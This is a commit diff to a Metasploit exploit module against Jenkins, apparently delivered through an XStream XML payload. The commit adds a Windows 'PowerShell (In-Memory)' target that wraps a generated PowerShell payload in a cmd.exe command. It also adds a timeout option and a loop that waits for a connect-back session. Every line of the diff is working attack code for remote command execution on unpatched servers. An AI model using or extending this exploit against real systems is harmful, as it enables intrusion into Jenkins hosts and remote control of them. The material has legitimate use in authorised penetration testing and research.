Add powershell payload to module
parent
77e76a80a1
commit
1c156c3d3c
|
@ -43,6 +43,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Platform' => 'python',
|
||||
'Arch' => ARCH_PYTHON
|
||||
],
|
||||
['PowerShell (In-Memory)',
|
||||
'Platform' => 'win',
|
||||
'Arch' => [ARCH_X86, ARCH_X64]
|
||||
],
|
||||
['Linux (Dropper)',
|
||||
'Platform' => 'linux',
|
||||
'Arch' => [ARCH_X86, ARCH_X64]
|
||||
|
@ -57,6 +61,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
register_options([
|
||||
OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
|
||||
OptString.new('PSH_PATH', [false, 'Path to powershell.exe', '']),
|
||||
OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for connect back", 30]),
|
||||
Opt::RPORT('8080')
|
||||
])
|
||||
deregister_options('URIPATH')
|
||||
|
@ -82,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
case target.name
|
||||
when /Unix/, /Python/
|
||||
when /Unix/, /Python/, /PowerShell/
|
||||
execute_command(payload.encoded)
|
||||
else
|
||||
execute_cmdstager
|
||||
|
@ -99,6 +105,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
%W{python -c #{cmd}}
|
||||
when /Windows/
|
||||
%W{cmd.exe /c #{cmd}}
|
||||
when /PowerShell/
|
||||
psh_opts = { :remove_comspec => true, :wrap_double_quotes => true }
|
||||
%W{cmd.exe /c #{cmd_psh_payload(cmd, payload_instance.arch.first, psh_opts)}}
|
||||
end
|
||||
|
||||
# Encode each command argument with XML entities
|
||||
|
@ -111,6 +120,21 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'ctype' => 'application/xml',
|
||||
'data' => xstream_payload(cmd)
|
||||
)
|
||||
wait_for_powershell_session
|
||||
end
|
||||
|
||||
def wait_for_powershell_session
|
||||
print_status "Waiting for exploit to complete..."
|
||||
begin
|
||||
Timeout.timeout(datastore['ListenerTimeout']) do
|
||||
loop do
|
||||
break if session_created?
|
||||
Rex.sleep(0.25)
|
||||
end
|
||||
end
|
||||
rescue ::Timeout::Error
|
||||
fail_with(Failure::Unknown, "Timeout waiting for exploit to complete")
|
||||
end
|
||||
end
|
||||
|
||||
def xstream_payload(cmd)
|
||||
|
|
Loading…
Reference in New Issue